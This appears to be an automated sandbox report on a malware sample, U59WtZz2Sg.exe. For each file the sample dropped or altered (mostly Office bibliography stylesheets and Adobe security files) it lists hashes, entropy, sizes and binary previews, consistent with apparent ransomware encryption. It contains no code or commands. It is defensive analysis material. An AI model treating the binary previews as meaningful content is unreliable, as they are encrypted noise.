Preview:	{.. U$q\|.M.V.....G..9Yu.....lw.>......'.....^a........3`..z../z.l...@.L.-....l.....IC.......Op?wc..P?t...e.u..).?.8..Q2..7........a....\.Q!.@C.. .........$~.......Lb0H.fB...$%e.....@..]g..N.;..z&.H<{.M..X.../.A..+@Z...o9.%.......T.....o)f...P.....d.'.^}.62....=tC}Y.w.h.O.$.E~....X6.7.9R.Q.C.........r........yDNY],..r..1].g...>4.,83....^E....ax..=.^..mZ.&.}.]?..A.e..y..~4...GZ....iLxU........RO..4.9......Y.].y3..d...7....?.3.... .@-.:........\|P..!.`.j.....s........%...........%.5BN$K7..X .n....(...]jn.9.^...U#....1...f~.z.....#..1w.t.z...;.n.5y.Q..D3....k ..!....OT.\|.FAj#.8.....l0j..@......0m;P.zX...!.....l...q....(....D...j5.o.O[F.1z..........".s...'.<6.09......K.3.."...mxu~Vj.}...6.2...D.......Z..4..^..=.s.FF.c..e..O.}}...i~.-x..NP..[.nL~B...?9G...^.(.{`.i...7W.....7..R...........b......../.F...gV......Y......FM.o....Jk.".._.../..o.si..D.F.^I....MF1C......bl.uPs....5.d..&\..[mcV.F....R.G."..v....$.`<..A.O..j..0..c.B.n.

C:\Users\user\AppData\Local\Temp\tmpCDDA.tmp

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable, MZ for MS-DOS
Category:	dropped
Size (bytes):	680782
Entropy (8bit):	7.986709275401265
Encrypted:	false
SSDEEP:	12288:B8Odvb52bjFgvC1p3YdF8GJF6y9NbgGUx0kXZPwtSRGG/t6i5l5kCYlSV:+rjqvC33+d9V3U/XZPwYRGQ6i5l5k5l4
MD5:	00CD000795D4B83B9DA0B4457B6D58A7
SHA1:	0B11A1434D108FD6E552DE3D314C6CBD9696C507
SHA-256:	E6017AA15D4E999121CDDB656EB9B4C1FDB9A785E93CCF4136269F26701F002D
SHA-512:	9F5410B2694A48ACDEFBC2BB0639618A5E46795F2AB06D6F5ACD16C2874EEEAD14AB79808161BA9FD1C99BB78F4041877F9246DEC77B1C5A6B44C867D8E935E9
Malicious:	true
Reputation:	unknown
Preview:	MZ...qD6.o..t.o........f.[...Z...........>....nLy......WS...DI...My.~......8...H[..3.W+..l..Rr>.8...&..$Fc\|O.tx..Vr.bn..GZf.a.i`..J{.H.s..-.+.M@....{....Y/..0..1.-.%z..K..`..~~..U.A(T.....7..C..@....3..0 ....$.'._....YeP.6....h_v'.K......\../.O!....k.d!H......:.....W6..o...i....V.e...>..at.9..~@Vk.NP._$3..v8.~.....H..9..H>...e!H.~..eIy.cCcv.S~.o.umA.fi...{....R...V.....j...VFn......&..B.........:.@;.......>......@.U.}2.`..-.?1..2.3.o#..G.r.......O.:..=.z.(.^...U.F.&5.F.>....k.4...%.80...h.....S...H.........,]..%.~...CAd....ix.).V....-.e..+..>[..].I.]..a....jo.....Xe~...!l3...o...%....B.......hB.rc....$...%.[....4.".B...8..].l......p;R...."p.,lC..z..;./.+.[.....+...::s..R.nP.5...)...dSVp{.....A......c...,J..w.n.yZF.J=.K.7.(.%.....TT.....P........Cb.T..P\....Q....).e9.`.-...w,2..B..h.....NF...3.^&!C(If......f.i..Y...Y.....v.Q#..U..\pV...B=...(@.J..%W....-.G...bi!.K....@..!..!...c.k...3.0.2.'5......zp.gF.g..YN...........Y.....

C:\Users\user\AppData\Local\bowsakkdestx.txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	896
Entropy (8bit):	7.743087941229848
Encrypted:	false
SSDEEP:	24:YE+LwUoe/v7MqBoPhWzgq+ddGO1owdiJ9ubD:Yb0Uomv7MSyhkgq1O1oUmqD
MD5:	3F8340F8DB9ED4F36F0607ED8493B7F5
SHA1:	7E55FE91F0F0A427C333AC9E24258AEC9A8ADAD0
SHA-256:	26D21583DE314DE53E901EAED4C602C4631B5CD77692CA5C766F6CDF67E6F125
SHA-512:	191B161B9D410F3A61A8EBCCD6706CC878DD768D0C766A27883745C046BF1D5ADB9D3F4DFE17282FF49B195DE4B01DACC437C780DC2F4A64E509829F0F3A9086
Malicious:	false
Reputation:	unknown
Preview:	{"pub....Z.M..X.].&iY.D...){8t'..D...[#..m.<W.3...c..70..J.A(qt....rRh....7.i......j6.........=._......... .. l.4.......D.9Z.^.l....WT.n.2y\|Z...t.]w^.L_.O\.....YNU..P.{I.^.......f.......#h.I`..Xub.'.B;..ch.D...j......(z.q2[,.WR.~X.( .\|>..@5.......\|...o.dQ.M..R.}5..d...&.h,....Mw,3.1....y...>.i.+".,].l..by....fGs'l........F... .jC..x.w.v.D..}.s.,">e....mw.x[.[c..M.Ut.2y..5......$c..R..w...n.l.q..s.....C.....U..?........!..s..I9.0..Qc......)7..r0... .....K.%j6.\y....Z.....-.o.w..I......Y\|..\|...`.[.....kv..._L...[.E..]M....U...F..s.......Bi~..1......M.K~.....\.FR.......'9.WY0.f.Q.....n.8Z....Uw._...3....... ..gO...$..V.k....=.6.h-........f.'..H........V..=."...r...0Ny....FA...}...0.79..{S9. ......P.<.2...Xm...Nwh"..'..5cr.!P.&.15..v(.<D......>....D..#.y...ULEk&.+.K....W.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	971
Entropy (8bit):	7.794151387116426
Encrypted:	false
SSDEEP:	24:PMCcD/5vH5l5OjBAvDsWdh98CbtRVFN6DXbD:wDxP5mjBAvPdH8UtpN6DrD
MD5:	8E87EA89D8F77E6BEB8A632C097204B0
SHA1:	E28B93AC7B164DF2D7738B156A015C039453F5E9
SHA-256:	B6C920E81AEE997FEB55CAF1881BA1058566987479BDA97F54C58F2CD79201D5
SHA-512:	A4B8254FB0AF60EC1CB45997381DDA6E1FC3BDD6CE0E4FEC64B19170B9CBE4CCE0167FB385DF5B8A6F38FE866121B269FDFBFC4B8E94F0129F09C889AF01A0DF
Malicious:	false
Reputation:	unknown
Preview:	0..y0.g..Z.E`..F..n..`..;(....f.........l8.+..m..............Ir.x&...+.y.r....$h...\......;k.)o..~.x...................48=....~c..s..G.z3.2..A...W.....x,<...Q.5.3+.....E...F..."l.H1.r...C.jl.m.a._...@....u.&$.$....R....d.0..Chc..4.R8!\|...{.....,<2.t...Xg..IP.7......"W#..R?.......q.3K.&-Al....g.H{....`..B\|.S&..d...aE......x$.`....p=+....^B.,.,. c.._'s................g73wA.PC....Ca*2.@CZ.....\|.l..U....N..O.ha.+.N.g0......Zs.....J. ....19....I.\. ......'..2:.sH..N.Z....5...5pOT.un.\.cG... Y/..%..t.q%......s-........5}p.mp..w].#wJ.].;.^\:.2..MOD..&=.......K.Z]...`R,..OSe....r.w............5...>.g/Y.I..%...k@...Y;,;d.n.....W.x.L..I....jb.....\|+-b...}g...5...B-..a2.[...U......d$.k...L...>~..U..i5E.....Xc8..o).....IU.b......Jw....#.&.'{.....c.....v...F........._^K......`.v y.0V....n2...`.....'@...Q..Q.Z.}J...5..Rw{k..........,.$.k$.S.....K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	759
Entropy (8bit):	7.65432312194707
Encrypted:	false
SSDEEP:	12:V/wJRc/OU7B5hxrAZmDx/SHYwvP9q1sz4KjaAT446HiIUxfxjcI/GlzDKtcii9a:taOOUFfmexgNg1sz/j+JiIGflDKXkbD
MD5:	B380994D790215EA6FCB4204E705CAE3
SHA1:	E530BAC055EC632C95A286ED6E0F90D534268C3C
SHA-256:	B7FF847BBAB0B417D0031F3B418DA5C0DAA92AF9C5A2166F2A7EC4D9E0055EE0
SHA-512:	DD78DA32FD55E14430942ED05EEC9756B82B6063B3760D4AD68CAD7B1C426A867093654380989D40BC5563A159059F48F6C35931CC9349C635AFBEBE628055E3
Malicious:	false
Reputation:	unknown
Preview:	0...0..A.b....F.(%._..Oo...'...'7....+4U..x1..aR.....O.....[60..V.....&.,:v2.^..A. .....8$...`...5.....)..V#..!....j...uqR..uR..).R\|."yCS.vi...u.e.....HTj...6%? ...&:.q.Jj....i?eX.U.jk.g"..7.<...[.p.v.K........3?...xK..z..C%...1d....._."....Y....ig...5......Z..n.....Ew........F.5.......T...S.M..N......$\|9..U.......g.CJ1.P..0..#........a.d...L.J...9..u.5.t....C..z...!..........A....o.. ..W..^.z..5#..rm./...ue..j.*..r.1;.H......P....\.1....[..E3..F./....=;.d....i..A..PW.....K..,....6.W.q.05......6..........M..9JB..y.....a...nJ..0.G.9K.Z..1.<4.xH.,8."....l...:.^..9..!:_..8...2..&.t.gmA..`..M7x.....b...z.!.N.emy.Xl....V5AX.9..^.p..:BK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	14790
Entropy (8bit):	7.9868926950523464
Encrypted:	false
SSDEEP:	384:TpiNCkVtsRMXaXOp6iW+o4YIroPGOjo/vpSI:lf+prWdCoPGuo/xV
MD5:	58503905493C5508998C452D18EFE510
SHA1:	07E4D1A6776D6DDC1BDAB40E5CEB6DD13E462F6E
SHA-256:	B7BCE6070896D6CB06EDCA77028CF650EDCA48048BFF282B2F60243CBE8BD2FA
SHA-512:	BA29C608BB1D5B67AC964A79DDFB6B63854C543315F64360D3D025F197D2B9AF1ACFFE26205004313CD608D76C9594B414A7226CCEBFAFD53C1B54455637DBC4
Malicious:	false
Reputation:	unknown
Preview:	%PPKLyn..\|...]...:.b.f.....F3.AsVEl....(Mv...L..}.7+w....t.L.E.\|..W.W.-.[.......S. .m.{8.....H.IL.pO..2.f.N2.....w>.Q..3..#e.T.......\.=.s...O..\|......]....V.V....Z.oU.p.......\|!........X...._.....$@..z... 9?.xd<v.J.{...?.dri.s..mw.Q...\q....T..G.%..o.tN...b..2..L.....<B!y.A.H=lZ...bJo.%..t.p..@....h^A.Kd.....uB"."+,..l'N.X....L.K..aL....Z.T..Z........+..@O#R...pbE0p..8...%.r=.pr...(t.....p~..[..lg=....S....E.s..x.&..k.W2.n...MS?.aJ...;...$;u..O..I...!-.."=.e...).8\|A>.HKe.......h."5..Y{s..v....5.........O.[..r.u.s.>..w.:A#.\|.TA.]..Y$.i"..'i........P..^..c`....i.ws3.n.x.......q.v..V..h..0"..v.L..5..\|...\|.*L.......{..KV...r.@....S..\|...S.A.......[.H]n..xk..Z.1.8..l.9.&.....4..D.w.......F..N...BW..uE..+H......b!...MC.~E.0."...'....~.3.Y3..p.r...6..[.f..3...!J...D..J.\.a=....2l...H....!a..%`...a..[\|........?>Yr.Kv.<...b.....2..o....T.W..d.....g..^.....:)..p..Dt.>..=..... LQ....%(..k#q.5.Z..z....D.(.{..[.~.5\K..X0.Y.G...._"f.H.v.8.../.

C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	333936
Entropy (8bit):	6.804827065927328
Encrypted:	false
SSDEEP:	6144:s3R3k+zn0NfeYGSYyC/iO+e4wFRIIPrXzIeueYm+R079Sb++qLjn/U0BeqxTLz2m:s3hkbGSYB1
MD5:	12553D0155C32E58C68A6457485FB031
SHA1:	7B3F83BBCE9C2A0D4F30C21C5B67BD12C4627E0F
SHA-256:	79C16F2461D681D61F74FC4A7058FC2EE87E89FD3A1E8380D1DCA595FD38CFED
SHA-512:	FDC6DD7177223F7F0718F6F3A05037375FF32EEC4D109EB79D374123F81E69234D27A81A66305CBEAF0947AE822CE51BC87C41433E653E6335FB04A77DD7F3A0
Malicious:	false
Reputation:	unknown
Preview:	<?xml)....R..V.a.no{..0M.2.....AH`.(i.8:.4B......0.&...F......58.&.:o...9a...e1.p..r.5s07..Q...C}.....fm.7......<..R.y....h....GR..PF.........p2QOD...#.m....V7.........2A...i.^....f.$....l..G....m.#......B"....j..q....u.....L.345qNU...+Pm..6..`F.."-.~p.A/.Aq..m..g..P.\u..jx...F...4..(..aw..{0p....v..R~6....^_....(.Q...ui.N.xb..\..Q..d.b\..+.......5........PT]e.qea.....+.....u.0..sZ..Z.@.Q..7Z.....d0.\|...qu^.:........(.O.c3.k'.r.s.).Oi&v....2.'X(..7W..$..A@.mc..S8...'.4D..dK....:.Qo>.. i(....U>;.FB.Q..Q.-......N4?-9.Ve.OV)s.<.......P.\|-91.f....@..e.X.Y~.A......a.6..:N.-...7....%D...g.....D.K...;....w...t..?.y#.}..fA.P..]L....-...... ...........1..^M./...7l..9}A.p.<7 .*....3`..S..........H.\|....xA.@l.6[y...."]..<{.'...&...).....y.T~{..Rm.O.~.E.o.N+.Ix.p..g...y.... 6......h.J.....5..-.;...KW..R.8....m.Z...:t.V..b...X.......j;&..O...z.o.&j.]..M..D..T.}...T..M...3...........%.hlh..q.e.k.)D..Q.d1....W.+..i,.r....N^C....T.#..N.Y...qx''.0

C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	297351
Entropy (8bit):	7.172613074887606
Encrypted:	false
SSDEEP:	6144:emuKb+AKQ/GkhaVVGwXeguqU6o4Uqk5Z3Vd1csaikbfoVokaZzOrswo3LdIkiX44:dbVFkVVdlK4Q
MD5:	3E45F71C20B9B3D28A56FF38A230B3C7
SHA1:	6BA13FA9560C482DED2BC7D7DA549DBA66BEE773
SHA-256:	729635F3697238098DFE66D0728E515DB9DE570FDBE0E292D121F8139922C919
SHA-512:	810FD8179ABA1F4F512DB1BD9868455EEDE83AE33209D989ACD270B8BB9A392E038AF437388E5E31BDA8679EFEF6C319A39B68EAB5C9A384EAA55F4F300BC44F
Malicious:	false
Reputation:	unknown
Preview:	.<?.!..b....G=.1V /!.H..#-......a..W.....X..@......s.nLLCD..e.;y......_......<..(...]......)+....e].{.s.E..h.+.d..m.Y.R...G...{...+.;..T.Hd.......q.b\|I...)`..F.2>.0.......%....'..$....m.....l....C..ti..!m.?.Ty...v.&w1(#....Iq...g..F2..N,.....?..i. .7..H^d....v...7.....x2....Q.8.S......@..M+....\|(..E$`..c.6B.N.u<.5.:L..V.K.;c^.D..?..6.-..T.p.[h...L.A7.k9...'...._[.m.2...F.u..i...}.. m3.cDw....j.lH.!..U.z@ADH...-.P@.....G.@..]....HS...dn...E.U..X.......~...\.d...t...e..5x<.......M...G.p..RC.]K..^.YIxKX.=h....y.$.!.g....O..x...o.~c.{f.o.Z.k.D....H....=../.1Di.oi3.`..<b6.b~7...'......`....N5...t....<...8&.....l..)...i7/....z.Im..(.)....t...Fyk..,{.M....B.SyF ..\|{jW...J..b..q.....o...\/p7a..K..%..f.;P.%WKc.5....NQ....^.....;.I....jD.._xu.i.}.._>.....~.b]...."?6..FA...#..b...Ks]L.:.O?.+...P.....h..6.dx..Hz.4..>v..=.{..~. ........`w......,[49.d2?L....O..m.1W.?...ZfA....L....4..i..(s....m../%.Y.y.-.....z.RLG.z..h...0........

C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	269004
Entropy (8bit):	7.322146720772359
Encrypted:	false
SSDEEP:	6144:Hyx+YOTcvOWGzfoosrQG1ej/yQzSS1apSiQhHDOruvoVeMUwFgOMJjot1FyJSkSt:4IYvOxzbsj
MD5:	E79128D5DE13F8F8633971F81A3AE111
SHA1:	0610D7D6FB28581508AA654973C4915AD46070FA
SHA-256:	9A4088F6DA122E4F150E197E8437865E975DABF7DD9476BC1283F6C466ADBEC3
SHA-512:	2AC28474A993D7FC5E0E49E14E2D29FDAE1978950651832ED1072B2F71FB54D106F36A64E5C642A7938837565D166D85C663A96F7E91D619BE71D840C7F9C3C3
Malicious:	false
Reputation:	unknown
Preview:	<?xml..F.;C..5.V........4X...?.......B..o...a..j.......>c......?z..`.._J........I.V7?..Wz:......Ag.?...K.c\|....Y..^.f.]l.u.X$K.c..)~.o./.Zk;..\|....>..^....;..~ZR-V."..z~`.:.$...g.>..0..?...< 2..$6...X.AK~...N...F..jt....4%zJ.6mC....l....C.k.#.$..[..=./...ij.,....R.0...r.X..f........R..oy.....~..L.:^.q.+.....C6.3Fi.w..y.-wa&..f.....8..Z.....R..0.J..u.k..........,..!....U~./l..1..:.j.g..$....<iy.#.5.CaI..B.+.1....a..V.]..n..+Q...U.].........l.j.S. hF.M..kV.o!...v..#pn....?.@.7.....Y1.....A:.k..\|atQ.....Vr\....u.Ag.0i.k%%...QIf.%j.9...m..^..<^_....v...C=.Q.2.00..w.....y.S.h......(i.YG7..i..i.......?.5........./x..A)..d>=..4t.=.RQ...s...-b f..>g.I...Q.j...L3"..s,.+.....m.G=.m=.O.n6pW.%...]^A....[.......n......d..7..7...B...F?.."R.....P.s..*.c.26.]G.."I..Z....m)..bA.....V...1M>.....T...T...~..Qc...z.1.V/..a.N)..(6....V.b_.+.0..H.....d..xg.(..K.#..,T.X.X.ni...`..:......;#2J...%.......!....k.b..Ux.0.).. ...Z(...v.....b...w.....v.c.f.a...{P

C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	256692
Entropy (8bit):	7.414018920605174
Encrypted:	false
SSDEEP:	6144:FfFggLHLJlKtq01aoGEsXvOsUfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkC:3ggLHLJlKvJGE8vOsDk
MD5:	0DD3826C236EDF67C00CDE426735FC2F
SHA1:	99B8466E61BA3E37B23B456258D8B20D3B2F3406
SHA-256:	F30D73FFD5692FB2093BE7AE53FD3DB5BFDD74B7BBF0C294DF1A1AC74513D49D
SHA-512:	4699910CF29DA70BE1B55A7A1D5F14AF9AB51E56475DA2DD35724DAEFF6DE2E6BB26D01B3DA666356FD7DB6CF0163B0ACC0B0C903FA93CDA8669D2A3D115A3D0
Malicious:	false
Reputation:	unknown
Preview:	<?xmlK;..;.#/F'Y.i.Y.9~#....p..IlFzr2..5..QY..>..5....r.e...d_:...B)..1.6.l.......~...m..N_.{.?7...xKq....3s#.d............6<..q!cbf&5j......7...K..R#.\......B..l4..V..A%mO&KD/;{6...7.,..i.'./e,...:...A).@lb.f.......Q<..25g=.)x......t..t\|.Q<...6...%k.z...E.\|..}I.?/.....]...V2............r...q8...M....7'...Y...O..>.......}....5wH....o.n....n.%7....@nJv...j./...S.YIg.w.Wp[dEQ...F.<-....a.Q....R..7S...x........#.s..\....D+{i..fm.M_t!u..J..m...N.......'1.P)y.`..o..+.&.....P..j.\S...y...h.'...]h.\.k.rx!.......N..j..._..^..@...-.... V...2..9\|...9.;^.U..GhlA........B.....)/.T.....p4'..Q.a.Rw.E.n. .:....~...-..l&7.z.t\|..w.\.O.....2].I..[oe..d-._..k..j",,fB.f...;y.7S...[.oZ.~}..pW\..<.#..mm....<.....,~&.-.>...P..L.\.3.$ss8.b3...K.%@..N...fr.k.A..6.......\\e...Zt........4.#..`.]..d.....*S.5.......k.qhm....T.QO..4w.....I].4..8.c.....Vvx....h..%...Bc.....OP..!.['_w.....i..K.....2.EOV.V.$.'0...lj.Jo..G03.$$3.......H.)....Fz.W....'6`w.fV..gbwI...P

C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\GostTitle.XSL

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	251783
Entropy (8bit):	7.438285421458999
Encrypted:	false
SSDEEP:	6144:twuQNuoD0+VWmfJrE4wJfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1Xkaj:cNJbVWyrUhk
MD5:	E2B72B92ADBAEF0FCD142EB2A8A1E45F
SHA1:	FB809E33F35A5160216612A045E3AE3D0A156392
SHA-256:	7E3CBBCE3B18736FEA0118F8084EBA24EF2660DCE64C2F6E2328B42C8CBCC1F6
SHA-512:	C92BFC2CA57622E093EB1F08D87BAA3BB1BBA6B398A1BA67A1B32A17E4C30ECC233075A4C08BDFD3CF865F5D4D260F203358BDEBACEA3C56F9651B0BD9E28290
Malicious:	false
Reputation:	unknown
Preview:	<?xml.-.....#.Z0w...vN..Is...#.-c..r.f..0......v..hn6..^.f....x...t..T..4.+......7..1...Q.e.o88...4?.......w......X.YJ.........<+[e...)G~.....9D.:....k.VEj...xm..U......G.......).....y.dX@o\.<I.......b.5~..u.f.)......&...o...D7.).j..._.T. ......m..?M.<$. ..4..T..........o}...kCmSb..&.b..........P.z..\YB..vM..d.:.P.1.dh...J.....7^?F.{I........QY8RMs..{.^MvV.....#..'..l...ea.E.....0...A{....>8/6>..^.Z.g<..=#A>...b}..8K...I.....W..2C".F..;..cY.e.....B..........,......`.X.d..?.`.....V.Y...."....,..I=:...X7.%JJh.Zru...8....j....!..=_....w.(B..Wk.,...T...+.Y........X\C...".d.....Gj...;%it6.f.'`.....>.a..11z.<)x ..)..}.s.].[.-W...........c..\|._E...:...PJ.$Me...h.C..."...'.....!.....'.5L..b...9ka.s..2#I.....;.!p................+..L.>.?..iN.t.t.B.).>...fr.Vp?...I.S..u.d<z..R.&.0.0`..~.[.i.?=.....g.._.q..b;.]R...".o....*..V9X.B...~l...Q.5.V......,.....5A..D..<:q(p.:.% ....~.o5%..A....c$......a._ k.Ex.....ZtZ..m..Z......A[Cy.\{....S

C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	285136
Entropy (8bit):	7.262346922747161
Encrypted:	false
SSDEEP:	6144:KwpWeIvnlMGnW89smF5DyFQzCWlASxrStAtXWty8zRLYBQd8itHiYYPVJHMSo27w:L5IvnlMlCs2o4lc
MD5:	3D0F4AD7391782DA88F858031488CCEE
SHA1:	CC2B8622A38D94C10BBAA51698DC2E5E3E60275F
SHA-256:	60A6F2F7C5F020A611B30A7CE8B49E29A9E548654D1496E916AB80F874979915
SHA-512:	535256EEAEA234802A1DA724695040A9986154262FC6588ECDB508DC611D5305262529518FD39AF85A40E4F2CA6656B5749B0EE2AD4FFE960BB3B6B9E6AABF22
Malicious:	false
Reputation:	unknown
Preview:	<?xml]..7..(..DO.HqZ.....Z......LW..4..=...6.>..g..WT.@......3G.3Sx.7..a..B.?..s..}..$.?1e\#..Bd...H]..Q......g...G...b3OB..v~.u!g....;.:....w.......1_$.-.!.. 6._...h2.^c......R....]?.L..9..<.O.-L.Z.........r.y.Bw...jP...[.I.)..^...`9...x.Tj.W.Kf..!.1..B.._AI.xq..J...jK.16..W..W.....4LX$P.2.}..... ~...)%`..d.%.a.B...{%.......D.@S..g....;b.L_......8...B".tN.\..X.G.....AM.o..6.-..N.7N....P......#.b..O.\...5-.v...g}.2..{.YTw;.X.:...^.e...%........0.,.n.0..R.....#r1...M. =..v..].;..".E......C....N..f8 ...1....3..:..^j%d.<.......45!.]y.W........_l...qb..Xw.C^...y.pO.....QT ...1..E.......C.......p....\J.\|&..FS......:z.7.T8....&@}OH...e..g...>.........h].....&.>...?.:$}J.\..Qk.RS......HV....D~.%....Mc..I.Q....S....G. 0.!.@e..t[J@..$....t...<BFJ...g.s....T..E...x.i.M.d.k.PZ..\....:....9.L?...........<......C...u.....t.....Xk..g..q&J..g..V..V.n`.\|.....S.I.7..[.6..i.=Z!i.`...-SzE<...>..u~C..V.D..\.O...W.....AEJ..Q.7%i...2q<....Zy.r..=..QS`...

C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	294859
Entropy (8bit):	7.180389065534566
Encrypted:	false
SSDEEP:	6144:8WVzdMUqV5lF2jzdH8Y3Uvz04hfhf7v3uH4NYYP4BpBaZTTSSamEUhbpPkLWPOIv:XVKUqxF0d9kz
MD5:	D658C4B4DC2646237D2973F95F619B92
SHA1:	8B288733FF836AF378FF4FF2F2A243350C77821B
SHA-256:	6867A6A768C752378A8D3B9A95C364C1CA8255EA99AA9933870017EF30796738
SHA-512:	9AABD275F4081DB28CDBE6CA131CEA6697A6B4709A68BA17D7CC9235EBF3402384B17A69DF3C93A60DBBDCAF0F5F1957A372E239D23AB46BDC90E2403D2B1FA9
Malicious:	false
Reputation:	unknown
Preview:	<?xmlL..0......;.E..%#....3..5.P..^.."!K.x.2....]...q...fk'...o...1@).?bo._,..E\|n+..u.S.....\`^n.V,Lb..K;.=.3YK..I....6..z..c.)...O...M...!..&..........80[.B..J.....%Z.Z[Vg..q...~.["-..+v.(.x...eYp...R.....bs0..J......]..yb2f.A.H}.uMv.:1.).'p..j.b.....P..6?.f..?.x.\Y...Zx..w........PZ.q$3N....;g..buO.!k+.%.H.6.......:.!W...aQ...z.....>...}X.m..........UjjV.%g.Ss....BT......Gk.......Z..I...""bs)J......t!-...4..Y.F.Vf..]rQ.!..Ol.b..Bl...u....2aG.4.D..\6~.....nz.ljw.f..".r..is....W..'.Q2 ....!E..,5.A..K.Fn.P...Zm.u..d../.....!.....$?..f.`...6......Y5..ru..r...9....^....n.L....UDM.......n.!.C...T...k.H.+#.h...8...t.<h..S.!..9.......S....'6.v....j...p...I...)7#+3..O...p.G{.....AR4..yR..].`..S~...l...4l0.s..]..P$..........\|.n....Y....x.".7...TUn..\.;.Mc..S.Y.oL.U."..../..Lx..B....Dk.O..#.......L!...^1...&....v.+.] ..O..a.=.....:..^..w..v....ty....v.5.....8..{...4.....$.zU..^k....+.........7.7SJ...$RD$...>....e...d...$.Hw.t.b3.".......\... .

C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\ISO690.XSL

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	270976
Entropy (8bit):	7.312608734429095
Encrypted:	false
SSDEEP:	6144:4/mBL53DZzo4OTFNL4hLbM0Ng0d4Jsq7vImej/yQ4SS1apSiQhHDOruvoVeMUwFl:/BZ5gFVmLt3dV
MD5:	E3701C0C0831FDC2C1623C0A5758FBB7
SHA1:	061CC4EDAC01FAEC14580CC6B2F6AC9E0E6D18C8
SHA-256:	09DDAD8A3C8A216ACC0C6996F05B5A58937C180C8292478758524AD3C7CD11D4
SHA-512:	D84A39394955FDD597B0224F2EC760AC0E8F8927D6906C9DB7DD001CCAFD2778334F283DB2E1405D1877A0EF2E0AC4FBF34EB10491E2CC0F65C0D8F42F41ACC8
Malicious:	false
Reputation:	unknown
Preview:	<?xmlC-...)QYL......1D..2L\|{2...p..2..MDv.../.N...s.b...I}..j=v....Xe....\|A.....'.......B...Q..{.....F~.$]T3q}....$.......q...re...,.1.;}:.:...).Y...y..icmd..~F6zI...t.`}.x.....V]..?.bS,...e..2M.l....{.c6....rY./..&.A?..........3.......U....2.>fC.f...(..08T.\|\!/../.".`...3...?..../....F.....k#......[Q..q...k.k..>...J.9....Q..#.......A.,...+.n.:.+-..6....}H...u.3.....D.....{..5....%...>^.8.\.LB.(..2FZ..0L..........~.9W..l.....u....d..p+.0..J.lm...5+....lJ....=7... {..).,...kd.v.$.%..i.X.,..SNF....D.......F..=Z.tE.1E$......V...M....:.V....fjP.....H..X..(....nK^...:3lVW...cu.bN..;..c.;.&]6.....F.......u.*...P....lx...z.......UV....;...\.Gs..^)..3.W.2onF...........K....=...C.`..pK.;x..`.,..1.d9..."rh.S.JwAa^..G..q..4.7Q.pV.Y9.K.H'.qKEb.T....\/.......2B..b.$?F..{........l&_}..72.\|...W.#....;.N.h....rG.J0B.5'....T....1.`D R......\|\|..w;..."nM?G.....%.._G.!..P.K...}........=.o...=.;?0...........qL.[..........R....>.Q('.^..8...."H..

C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\ISO690Nmerical.XSL

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	217912
Entropy (8bit):	7.663802200569065
Encrypted:	false
SSDEEP:	6144:BxekXb5+vuNDuy9wIdQUmg9wZc2xymj/e8kQR3T+vtgA9opdXHl238jiK2hpU7MG:BxFfUTU/98Nj/e8kQ
MD5:	FFD1750D97291E429379A424A61C3FB7
SHA1:	BFDEFD9316BFE9150824188C591C4B753F002E5D
SHA-256:	A33771C582E90A572A58C78196A612D8CF5137E277ECD56369FB95AEFA7B652C
SHA-512:	5F5E48F4583BD7056265C3CE7991F298C1BC0644307BF3DB8F90E4E9E3D92E34861C7610505ABA2F4D4FB6FDE5FF7378DBD98BB99C52B07077E7F1C8E54C28A4
Malicious:	false
Reputation:	unknown
